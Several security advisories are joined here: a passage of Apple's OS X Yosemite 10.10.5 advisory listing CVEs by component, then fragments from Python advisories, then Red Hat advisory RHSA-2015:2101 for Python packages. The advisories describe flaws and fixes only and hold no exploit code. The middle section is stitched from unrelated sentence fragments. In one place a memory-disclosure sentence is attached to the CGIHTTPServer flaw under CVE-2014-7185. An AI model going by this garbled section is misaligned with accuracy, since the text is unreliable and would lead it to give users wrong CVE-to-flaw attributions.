IOBluetoothHCIController. This issue was addressed through improved
memory handling.
CVE-ID
CVE-2015-3779 : Teddy Reed of Facebook Security
Bluetooth
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious application may be able to determine kernel
memory layout
Description: A memory management issue could have led to the
disclosure of kernel memory layout. This issue was addressed with
improved memory management.
CVE-ID
CVE-2015-3780 : Roberto Paleari and Aristide Fattori of Emaze
Networks
Bluetooth
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious app may be able to access notifications from
other iCloud devices
Description: An issue existed where a malicious app could access a
Bluetooth-paired Mac or iOS device's Notification Center
notifications via the Apple Notification Center Service. The issue
affected devices using Handoff and logged into the same iCloud
account. This issue was resolved by revoking access to the Apple
Notification Center Service.
CVE-ID
CVE-2015-3786 : Xiaolong Bai (Tsinghua University), System Security
Lab (Indiana University), Tongxin Li (Peking University), XiaoFeng
Wang (Indiana University)
Bluetooth
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: An attacker with privileged network position may be able to
perform denial of service attack using malformed Bluetooth packets
Description: An input validation issue existed in parsing of
Bluetooth ACL packets. This issue was addressed through improved
input validation.
CVE-ID
CVE-2015-3787 : Trend Micro
Bluetooth
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A local attacker may be able to cause unexpected application
termination or arbitrary code execution
Description: Multiple buffer overflow issues existed in blued's
handling of XPC messages. These issues were addressed through
improved bounds checking.
CVE-ID
CVE-2015-3777 : mitp0sh of [PDX]
bootp
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious Wi-Fi network may be able to determine networks
a device has previously accessed
Description: Upon connecting to a Wi-Fi network, iOS may have
broadcast MAC addresses of previously accessed networks via the DNAv4
protocol. This issue was addressed through disabling DNAv4 on
unencrypted Wi-Fi networks.
CVE-ID
CVE-2015-3778 : Piers O'Hanlon of Oxford Internet Institute,
University of Oxford (on the EPSRC Being There project)
CloudKit
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious application may be able to access the iCloud
user record of a previously signed in user
Description: A state inconsistency existed in CloudKit when signing
out users. This issue was addressed through improved state handling.
CVE-ID
CVE-2015-3782 : Deepkanwal Plaha of University of Toronto
CoreMedia Playback
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Viewing a maliciously crafted movie file may lead to an
unexpected application termination or arbitrary code execution
Description: Memory corruption issues existed in CoreMedia Playback.
These were addressed through improved memory handling.
CVE-ID
CVE-2015-5777 : Apple
CVE-2015-5778 : Apple
CoreText
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: Processing a maliciously crafted font file may lead to an
unexpected application termination or arbitrary code execution
Description: A memory corruption issue existed in the processing of
font files. This issue was addressed through improved input
validation.
CVE-ID
CVE-2015-5761 : John Villamil (@day6reak), Yahoo Pentest Team
CoreText
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Processing a maliciously crafted font file may lead to an
unexpected application termination or arbitrary code execution
Description: A memory corruption issue existed in the processing of
font files. This issue was addressed through improved input
validation.
CVE-ID
CVE-2015-5755 : John Villamil (@day6reak), Yahoo Pentest Team
curl
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Multiple vulnerabilities in cURL and libcurl prior to
7.38.0, one of which may allow remote attackers to bypass the Same
Origin Policy.
Description: Multiple vulnerabilities existed in cURL and libcurl
prior to 7.38.0. These issues were addressed by updating cURL to
version 7.43.0.
CVE-ID
CVE-2014-3613
CVE-2014-3620
CVE-2014-3707
CVE-2014-8150
CVE-2014-8151
CVE-2015-3143
CVE-2015-3144
CVE-2015-3145
CVE-2015-3148
CVE-2015-3153
Data Detectors Engine
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Processing a sequence of unicode characters can lead to an
unexpected application termination or arbitrary code execution
Description: Memory corruption issues existed in processing of
Unicode characters. These issues were addressed through improved
memory handling.
CVE-ID
CVE-2015-5750 : M1x7e1 of Safeye Team (www.safeye.org)
Date & Time pref pane
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Applications that rely on system time may have unexpected
behavior
Description: An authorization issue existed when modifying the
system date and time preferences. This issue was addressed with
additional authorization checks.
CVE-ID
CVE-2015-3757 : Mark S C Smith
Dictionary Application
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: An attacker with a privileged network position may be able
to intercept users' Dictionary app queries
Description: An issue existed in the Dictionary app, which did not
properly secure user communications. This issue was addressed by
moving Dictionary queries to HTTPS.
CVE-ID
CVE-2015-3774 : Jeffrey Paul of EEQJ, Jan Bee of the Google Security
Team
DiskImages
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Processing a maliciously crafted DMG file may lead to an
unexpected application termination or arbitrary code execution with
system privileges
Description: A memory corruption issue existed in parsing of
malformed DMG images. This issue was addressed through improved
memory handling.
CVE-ID
CVE-2015-3800 : Frank Graziano of the Yahoo Pentest Team
dyld
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A local user may be able to execute arbitrary code with
system privileges
Description: A path validation issue existed in dyld. This was
addressed through improved environment sanitization.
CVE-ID
CVE-2015-3760 : beist of grayhash, Stefan Esser
FontParser
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: Processing a maliciously crafted font file may lead to an
unexpected application termination or arbitrary code execution
Description: A memory corruption issue existed in the processing of
font files. This issue was addressed through improved input
validation.
CVE-ID
CVE-2015-3804 : Apple
CVE-2015-5775 : Apple
FontParser
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: Processing a maliciously crafted font file may lead to an
unexpected application termination or arbitrary code execution
Description: A memory corruption issue existed in the processing of
font files. This issue was addressed through improved input
validation.
CVE-ID
CVE-2015-5756 : John Villamil (@day6reak), Yahoo Pentest Team
groff
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Multiple issues in pdfroff
Description: Multiple issues existed in pdfroff, the most serious of
which may allow arbitrary filesystem modification. These issues were
addressed by removing pdfroff.
CVE-ID
CVE-2009-5044
CVE-2009-5078
ImageIO
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Processing a maliciously crafted TIFF image may lead to an
unexpected application termination or arbitrary code execution
Description: A memory corruption issue existed in the processing of
TIFF images. This issue was addressed through improved bounds
checking.
CVE-ID
CVE-2015-5758 : Apple
ImageIO
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Visiting a maliciously crafted website may result in the
disclosure of process memory
Description: An uninitialized memory access issue existed in
ImageIO's handling of PNG and TIFF images. Visiting a malicious
website may result in sending data from process memory to the
website. This issue is addressed through improved memory
initialization and additional validation of PNG and TIFF images.
CVE-ID
CVE-2015-5781 : Michal Zalewski
CVE-2015-5782 : Michal Zalewski
Install Framework Legacy
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious application may be able to execute arbitrary
code with root privileges
Description: An issue existed in how Install.framework's 'runner'
binary dropped privileges. This issue was addressed through improved
privilege management.
CVE-ID
CVE-2015-5784 : Ian Beer of Google Project Zero
Install Framework Legacy
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A race condition existed in
Install.framework's 'runner' binary that resulted in
privileges being incorrectly dropped. This issue was addressed
through improved object locking.
CVE-ID
CVE-2015-5754 : Ian Beer of Google Project Zero
IOFireWireFamily
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A local user may be able to execute arbitrary code with
system privileges
Description: Memory corruption issues existed in IOFireWireFamily.
These issues were addressed through additional type input validation.
CVE-ID
CVE-2015-3769 : Ilja van Sprundel
CVE-2015-3771 : Ilja van Sprundel
CVE-2015-3772 : Ilja van Sprundel
IOGraphics
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A memory corruption issue existed in IOGraphics. This
issue was addressed through additional type input validation.
CVE-ID
CVE-2015-3770 : Ilja van Sprundel
CVE-2015-5783 : Ilja van Sprundel
IOHIDFamily
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A local user may be able to execute arbitrary code with
system privileges
Description: A buffer overflow issue existed in IOHIDFamily. This
issue was addressed through improved memory handling.
CVE-ID
CVE-2015-5774 : TaiG Jailbreak Team
Kernel
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious application may be able to determine kernel
memory layout
Description: An issue existed in the mach_port_space_info interface,
which could have led to the disclosure of kernel memory layout. This
was addressed by disabling the mach_port_space_info interface.
CVE-ID
CVE-2015-3766 : Cererdlong of Alibaba Mobile Security Team,
@PanguTeam
Kernel
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: An integer overflow existed in the handling of IOKit
functions. This issue was addressed through improved validation of
IOKit API arguments.
CVE-ID
CVE-2015-3768 : Ilja van Sprundel
Kernel
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A local user may be able to cause a system denial of service
Description: A resource exhaustion issue existed in the fasttrap
driver. This was addressed through improved memory handling.
CVE-ID
CVE-2015-5747 : Maxime VILLARD of m00nbsd
Kernel
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A local user may be able to cause a system denial of service
Description: A validation issue existed in the mounting of HFS
volumes. This was addressed by adding additional checks.
CVE-ID
CVE-2015-5748 : Maxime VILLARD of m00nbsd
Kernel
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious application may be able to execute unsigned code
Description: An issue existed that allowed unsigned code to be
appended to signed code in a specially crafted executable file. This
issue was addressed through improved code signature validation.
CVE-ID
CVE-2015-3806 : TaiG Jailbreak Team
Kernel
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A specially crafted executable file could allow unsigned,
malicious code to execute
Description: An issue existed in the way multi-architecture
executable files were evaluated that could have allowed unsigned code
to be executed. This issue was addressed through improved validation
of executable files.
CVE-ID
CVE-2015-3803 : TaiG Jailbreak Team
Kernel
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A local user may be able to execute unsigned code
Description: A validation issue existed in the handling of Mach-O
files. This was addressed by adding additional checks.
CVE-ID
CVE-2015-3802 : TaiG Jailbreak Team
CVE-2015-3805 : TaiG Jailbreak Team
Kernel
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Parsing a maliciously crafted plist may lead to an
unexpected application termination or arbitrary code execution with
system privileges
Description: A memory corruption existed in processing of malformed
plists. This issue was addressed through improved memory handling.
CVE-ID
CVE-2015-3776 : Teddy Reed of Facebook Security, Patrick Stein
(@jollyjinx) of Jinx Germany
Kernel
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A local user may be able to execute arbitrary code with
system privileges
Description: A path validation issue existed. This was addressed
through improved environment sanitization.
CVE-ID
CVE-2015-3761 : Apple
Libc
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Processing a maliciously crafted regular expression may lead
to an unexpected application termination or arbitrary code execution
Description: Memory corruption issues existed in the TRE library.
These were addressed through improved memory handling.
CVE-ID
CVE-2015-3796 : Ian Beer of Google Project Zero
CVE-2015-3797 : Ian Beer of Google Project Zero
CVE-2015-3798 : Ian Beer of Google Project Zero
Libinfo
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: A remote attacker may be able to cause unexpected
application termination or arbitrary code execution
Description: Memory corruption issues existed in handling AF_INET6
sockets. These were addressed by improved memory handling.
CVE-ID
CVE-2015-5776 : Apple
libpthread
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A memory corruption issue existed in handling syscalls.
This issue was addressed through improved lock state checking.
CVE-ID
CVE-2015-5757 : Lufeng Li of Qihoo 360
libxml2
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: Multiple vulnerabilities existed in libxml2 versions prior
to 2.9.2, the most serious of which may allow a remote attacker to
cause a denial of service
Description: Multiple vulnerabilities existed in libxml2 versions
prior to 2.9.2. These were addressed by updating libxml2 to version
2.9.2.
CVE-ID
CVE-2012-6685 : Felix Groebert of Google
CVE-2014-0191 : Felix Groebert of Google
libxml2
Available for: OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: Parsing a maliciously crafted XML document may lead to
disclosure of user information
Description: A memory access issue existed in libxml2. This was
addressed by improved memory handling
CVE-ID
CVE-2014-3660 : Felix Groebert of Google
libxml2
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: Parsing a maliciously crafted XML document may lead to
disclosure of user information
Description: A memory corruption issue existed in parsing of XML
files. This issue was addressed through improved memory handling.
CVE-ID
CVE-2015-3807 : Apple
libxpc
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A memory corruption issue existed in handling of
malformed XPC messages. This issue was improved through improved
bounds checking.
CVE-ID
CVE-2015-3795 : Mathew Rowley
mail_cmds
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A local user may be able to execute arbitrary shell commands
Description: A validation issue existed in the mailx parsing of
email addresses. This was addressed by improved sanitization.
CVE-ID
CVE-2014-7844
Notification Center OSX
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A malicious application may be able to access all
notifications previously displayed to users
Description: An issue existed in Notification Center, which did not
properly delete user notifications. This issue was addressed by
correctly deleting notifications dismissed by users.
CVE-ID
CVE-2015-3764 : Jonathan Zdziarski
ntfs
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A local user may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue existed in NTFS. This issue
was addressed through improved memory handling.
CVE-ID
CVE-2015-5763 : Roberto Paleari and Aristide Fattori of Emaze
Networks
OpenSSH
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Remote attackers may be able to circumvent a time delay for
failed login attempts and conduct brute-force attacks
Description: An issue existed when processing keyboard-interactive
devices. This issue was addressed through improved authentication
request validation.
CVE-ID
CVE-2015-5600
OpenSSL
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: Multiple vulnerabilities existed in OpenSSL versions prior
to 0.9.8zg, the most serious of which may allow a remote attacker to
cause a denial of service.
Description: Multiple vulnerabilities existed in OpenSSL versions
prior to 0.9.8zg. These were addressed by updating OpenSSL to version
0.9.8zg.
CVE-ID
CVE-2015-1788
CVE-2015-1789
CVE-2015-1790
CVE-2015-1791
CVE-2015-1792
perl
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Parsing a maliciously crafted regular expression may lead to
disclosure of unexpected application termination or arbitrary code
execution
Description: An integer underflow issue existed in the way Perl
parsed regular expressions. This issue was addressed through improved
memory handling.
CVE-ID
CVE-2013-7422
PostgreSQL
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: An attacker may be able to cause unexpected application
termination or gain access to data without proper authentication
Description: Multiple issues existed in PostgreSQL 9.2.4. These
issues were addressed by updating PostgreSQL to 9.2.13.
CVE-ID
CVE-2014-0067
CVE-2014-8161
CVE-2015-0241
CVE-2015-0242
CVE-2015-0243
CVE-2015-0244
python
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Multiple vulnerabilities existed in Python 2.7.6, the most
serious of which may lead to arbitrary code execution
Description: Multiple vulnerabilities existed in Python versions
prior to 2.7.6.
CVE-ID
CVE-2013-7040
CVE-2013-7338
CVE-2014-1912
CVE-2014-7185
CVE-2014-9365
QL Office
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: Parsing a maliciously crafted Office document may lead to an
unexpected application termination or arbitrary code execution
Description: A memory corruption issue existed in parsing of Office
documents. This issue was addressed through improved memory handling.
CVE-ID
CVE-2015-5773 : Apple
QL Office
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Parsing a maliciously crafted XML file may lead to
disclosure of user information
Description: An external entity reference issue existed in XML file
parsing. This issue was addressed through improved parsing.
CVE-ID
CVE-2015-3784 : Bruno Morisson of INTEGRITY S.A.
Quartz Composer Framework
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: Parsing a maliciously crafted QuickTime file may lead to an
unexpected application termination or arbitrary code execution
Description: A memory corruption issue existed in parsing of
QuickTime files. This issue was addressed through improved memory
handling.
CVE-ID
CVE-2015-5771 : Apple
Quick Look
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Searching for a previously viewed website may launch the web
browser and render that website
Description: An issue existed where QuickLook had the capability to
execute JavaScript. The issue was addressed by disallowing execution
of JavaScript.
CVE-ID
CVE-2015-3781 : Andrew Pouliot of Facebook, Anto Loyola of Qubole
QuickTime 7
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: Processing a maliciously crafted file may lead to an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in QuickTime.
These issues were addressed through improved memory handling.
CVE-ID
CVE-2015-3772
CVE-2015-3779
CVE-2015-5753 : Apple
CVE-2015-5779 : Apple
QuickTime 7
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: Processing a maliciously crafted file may lead to an
unexpected application termination or arbitrary code execution
Description: Multiple memory corruption issues existed in QuickTime.
These issues were addressed through improved memory handling.
CVE-ID
CVE-2015-3765 : Joe Burnett of Audio Poison
CVE-2015-3788 : Ryan Pentney and Richard Johnson of Cisco Talos
CVE-2015-3789 : Ryan Pentney and Richard Johnson of Cisco Talos
CVE-2015-3790 : Ryan Pentney and Richard Johnson of Cisco Talos
CVE-2015-3791 : Ryan Pentney and Richard Johnson of Cisco Talos
CVE-2015-3792 : Ryan Pentney and Richard Johnson of Cisco Talos
CVE-2015-5751 : WalkerFuz
SceneKit
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Viewing a maliciously crafted Collada file may lead to
arbitrary code execution
Description: A heap buffer overflow existed in SceneKit's handling
of Collada files. This issue was addressed through improved input
validation.
CVE-ID
CVE-2015-5772 : Apple
SceneKit
Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,
OS X Yosemite v10.10 to v10.10.4
Impact: A remote attacker may be able to cause unexpected
application termination or arbitrary code execution
Description: A memory corruption issue existed in SceneKit. This
issue was addressed through improved memory handling.
CVE-ID
CVE-2015-3783 : Haris Andrianakis of Google Security Team
Security
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A standard user may be able to gain access to admin
privileges without proper authentication
Description: An issue existed in handling of user authentication.
This issue was addressed through improved authentication checks.
CVE-ID
CVE-2015-3775 : [Eldon Ahrold]
SMBClient
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: A remote attacker may be able to cause unexpected
application termination or arbitrary code execution
Description: A memory corruption issue existed in the SMB client.
This issue was addressed through improved memory handling.
CVE-ID
CVE-2015-3773 : Ilja van Sprundel
Speech UI
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Parsing a maliciously crafted unicode string with speech
alerts enabled may lead to an unexpected application termination or
arbitrary code execution
Description: A memory corruption issue existed in handling of
Unicode strings. This issue was addressed by improved memory
handling.
CVE-ID
CVE-2015-3794 : Adam Greenbaum of Refinitive
sudo
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Multiple vulnerabilities existed in sudo versions prior to
1.7.10p9, the most serious of which may allow an attacker access to
arbitrary files
Description: Multiple vulnerabilities existed in sudo versions prior
to 1.7.10p9. These were addressed by updating sudo to version
1.7.10p9.
CVE-ID
CVE-2013-1775
CVE-2013-1776
CVE-2013-2776
CVE-2013-2777
CVE-2014-0106
CVE-2014-9680
tcpdump
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Multiple vulnerabilities existed in tcpdump 4.7.3, the most
serious of which may allow a remote attacker to cause a denial of
service.
Description: Multiple vulnerabilities existed in tcpdump versions
prior to 4.7.3. These were addressed by updating tcpdump to version
4.7.3.
CVE-ID
CVE-2014-8767
CVE-2014-8769
CVE-2014-9140
Text Formats
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Parsing a maliciously crafted text file may lead to
disclosure of user information
Description: An XML external entity reference issue existed with
TextEdit parsing. This issue was addressed through improved parsing.
CVE-ID
CVE-2015-3762 : Xiaoyong Wu of the Evernote Security Team
udf
Available for: OS X Yosemite v10.10 to v10.10.4
Impact: Processing a maliciously crafted DMG file may lead to an
unexpected application termination or arbitrary code execution with
system privileges
Description: A memory corruption issue existed in parsing of
malformed DMG images. This issue was addressed through improved
memory handling.
CVE-ID
CVE-2015-3767 : beist of grayhash
OS X Yosemite v10.10.5 includes the security content of Safari 8.0.8:
https://support.apple.com/en-us/HT205033
OS X Yosemite 10.10.5 and Security Update 2015-006 may be obtained
from the Mac App Store or Apple's Software Downloads web site:
http://www.apple.com/support/downloads/
Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
iQIcBAEBCAAGBQJVzM3+AAoJEBcWfLTuOo7tx/YP/RTsUUx0UTk7rXj6AEcHmiR4
Y2xTUOXqRmxhieSbsGK9laKL5++lIzkGh5RC7oYag0+OgWtZz+EU/EtdoEJmGNJ6
+PgoEnizYdKhO1kos1KCHOwG6UFCqoeEm6Icm33nVUqWp7uAmhVRMRxtMJEScLSR
2LpsK0grIhFXtJGqu053TSKSCa1UTab8XWteZTT84uFGMSKbAFONj5CPIrR6+uev
QpVTwrnskPDBOXJwGhjypvIBTbt2aa1wjCukOAWFHwf7Pma/QUdhKRkUK4vAb9/k
fu2t2fBOvSMguJHRO+340NsQR9LvmdruBeAyNUH64srF1jtbAg0QnvZsPyO5aIyR
A8WrzHl3oIc0II0y7VpI+3o0J3Nn03EcBPtIKeoeyznnjNziDm72HPI2d2+5ZSRz
xjAd4Nmw+dgGq+UMkusIXgtRK4HcEpwzfImf3zqnKHakSncnFPhGKyNEgn8bK9a7
AeAvSqMXXsJg8weHUF2NLnAn/42k2wIE8d5BOLaIy13xz6MJn7VUI21pK0zCaGBF
sfkRFZP0eEVh8ZzU/nWp9E5KDpbsd72biJwvjWH4OrmkfzUWxStQiVwPTxtZD9LW
c5ZWe+vqZJV9eYRH2hAOMPaYkOQ5Z4DySNVVOFAG0eq9til8+V0k3L7ipIVd2XUB
msu6gVP8uZhFYNb8byVJ
=+0e/
-----END PGP SIGNATURE-----
. 6) - i386, x86_64
3. Space precludes documenting all of these changes in this
advisory. This could be used
to crash a Python application that uses the socket.recvfrom_info()
function or, possibly, execute arbitrary code with the permissions
of the user running vulnerable Python code (CVE-2014-1912).
This updates the python package to version 2.7.6, which fixes several
other bugs, including denial of service flaws due to unbound readline()
calls in the ftplib and nntplib modules (CVE-2013-1752).
Denial of service flaws due to unbound readline() calls in the imaplib,
poplib, and smtplib modules (CVE-2013-1752).
A gzip bomb and unbound read denial of service flaw in python XMLRPC
library (CVE-2013-1753).
Python are susceptible to arbitrary process memory reading by a user
or adversary due to a bug in the _json module caused by insufficient
bounds checking. The bug is caused by allowing the user to supply a
negative value that is used an an array index, causing the scanstring
function to access process memory outside of the string it is intended
to access (CVE-2014-4616).
The CGIHTTPServer Python module does not properly handle URL-encoded
path separators in URLs.
Python before 2.7.8 is vulnerable to an integer overflow in the buffer
type (CVE-2014-7185). It was possible to configure a trust root to be checked against,
however there were no faculties for hostname checking (CVE-2014-9365).
The python-pip and tix packages was added due to missing build
dependencies. The verification
of md5 checksums and GPG signatures is performed automatically for you. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Moderate: python security, bug fix, and enhancement update
Advisory ID: RHSA-2015:2101-01
Product: Red Hat Enterprise Linux
Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-2101.html
Issue date: 2015-11-19
CVE Names: CVE-2013-1752 CVE-2013-1753 CVE-2014-4616
CVE-2014-4650 CVE-2014-7185
=====================================================================
1. Summary:
Updated python packages that fix multiple security issues, several bugs,
and add various enhancements are now available for Red Hat Enterprise
Linux 7.
Red Hat Product Security has rated this update as having Moderate security
impact. Common Vulnerability Scoring System (CVSS) base scores, which give
detailed severity ratings, are available for each vulnerability from the
CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64
Red Hat Enterprise Linux Server (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64
Red Hat Enterprise Linux Workstation (v. 7) - x86_64
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
3. Description:
Python is an interpreted, interactive, object-oriented programming language
often compared to Tcl, Perl, Scheme, or Java. Python includes modules,
classes, exceptions, very high level dynamic data types and dynamic typing.
Python supports interfaces to many system calls and libraries, as well as
to various windowing systems (X11, Motif, Tk, Mac and MFC).
It was discovered that the Python xmlrpclib module did not restrict the
size of gzip-compressed HTTP responses. A malicious XMLRPC server could
cause an XMLRPC client using xmlrpclib to consume an excessive amount of
memory. (CVE-2013-1753)
It was discovered that multiple Python standard library modules
implementing network protocols (such as httplib or smtplib) failed to
restrict the sizes of server responses. A malicious server could cause a
client using one of the affected modules to consume an excessive amount of
memory. (CVE-2013-1752)
It was discovered that the CGIHTTPServer module incorrectly handled URL
encoded paths. A remote attacker could use this flaw to execute scripts
outside of the cgi-bin directory, or disclose the source code of the
scripts in the cgi-bin directory. An attacker able to control these arguments
could use this flaw to disclose portions of the application memory or cause
it to crash. (CVE-2014-7185)
A flaw was found in the way the json module handled negative index
arguments passed to certain functions (such as raw_decode()). An attacker
able to control the index value passed to one of the affected functions
could possibly use this flaw to disclose portions of the application
memory. (CVE-2014-4616)
The Python standard library HTTP client modules (such as httplib or urllib)
did not perform verification of TLS/SSL certificates when connecting to
HTTPS servers. A man-in-the-middle attacker could use this flaw to hijack
connections and eavesdrop or modify transferred data. (CVE-2014-9365)
Note: The Python standard library was updated to make it possible to enable
certificate verification by default. However, for backwards compatibility,
verification remains disabled by default. Future updates may change this
default. Refer to the Knowledgebase article 2039753 linked to in the
References section for further details about this change. (BZ#1219108)
This update also fixes the following bugs:
* Subprocesses used with the Eventlet library or regular threads previously
tried to close epoll file descriptors twice, which led to an "Invalid
argument" error. Subprocesses have been fixed to close the file descriptors
only once. (BZ#1103452)
* When importing the readline module from a Python script, Python no longer
produces erroneous random characters on stdout. (BZ#1189301)
* The cProfile utility has been fixed to print all values that the "-s"
option supports when this option is used without a correct value.
(BZ#1237107)
* The load_cert_chain() function now accepts "None" as a keyfile argument.
(BZ#1250611)
In addition, this update adds the following enhancements:
* Security enhancements as described in PEP 466 have been backported to the
Python standard library, for example, new features of the ssl module:
Server Name Indication (SNI) support, support for new TLSv1.x protocols,
new hash algorithms in the hashlib module, and many more. (BZ#1111461)
* Support for the ssl.PROTOCOL_TLSv1_2 protocol has been added to the ssl
library. (BZ#1192015)
* The ssl.SSLSocket.version() method is now available to access information
about the version of the SSL protocol used in a connection. (BZ#1259421)
All python users are advised to upgrade to these updated packages, which
contain backported patches to correct these issues and add these
enhancements.
4. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
5. Bugs fixed (https://bugzilla.redhat.com/):
1046170 - CVE-2013-1753 python: XMLRPC library unrestricted decompression of HTTP responses using gzip enconding
1046174 - CVE-2013-1752 python: multiple unbound readline() DoS flaws in python stdlib
1058482 - tmpwatch removes python multiprocessing sockets
1112285 - CVE-2014-4616 python: missing boundary check in JSON module
1113527 - CVE-2014-4650 python: CGIHTTPServer module does not properly handle URL-encoded path separators in URLs
1146026 - CVE-2014-7185 python: buffer() integer overflow leading to out of bounds read
1173041 - CVE-2014-9365 python: failure to validate certificates in the HTTP client with TLS (PEP 476)
1177613 - setup.py bdist_rpm NameError: global name 'get_python_version' is not defined
1181624 - multiprocessing BaseManager serve_client() does not check EINTR on recv
1237107 - cProfile main() traceback if options syntax is invalid
1250611 - SSLContext.load_cert_chain() keyfile argument can't be set to None
1259421 - Backport SSLSocket.version() to python 2.7.5
6. Package List:
Red Hat Enterprise Linux Client (v. 7):
Source:
python-2.7.5-34.el7.src.rpm
x86_64:
python-2.7.5-34.el7.x86_64.rpm
python-debuginfo-2.7.5-34.el7.i686.rpm
python-debuginfo-2.7.5-34.el7.x86_64.rpm
python-libs-2.7.5-34.el7.i686.rpm
python-libs-2.7.5-34.el7.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64:
python-debug-2.7.5-34.el7.x86_64.rpm
python-debuginfo-2.7.5-34.el7.x86_64.rpm
python-devel-2.7.5-34.el7.x86_64.rpm
python-test-2.7.5-34.el7.x86_64.rpm
python-tools-2.7.5-34.el7.x86_64.rpm
tkinter-2.7.5-34.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source:
python-2.7.5-34.el7.src.rpm
x86_64:
python-2.7.5-34.el7.x86_64.rpm
python-debuginfo-2.7.5-34.el7.i686.rpm
python-debuginfo-2.7.5-34.el7.x86_64.rpm
python-devel-2.7.5-34.el7.x86_64.rpm
python-libs-2.7.5-34.el7.i686.rpm
python-libs-2.7.5-34.el7.x86_64.rpm
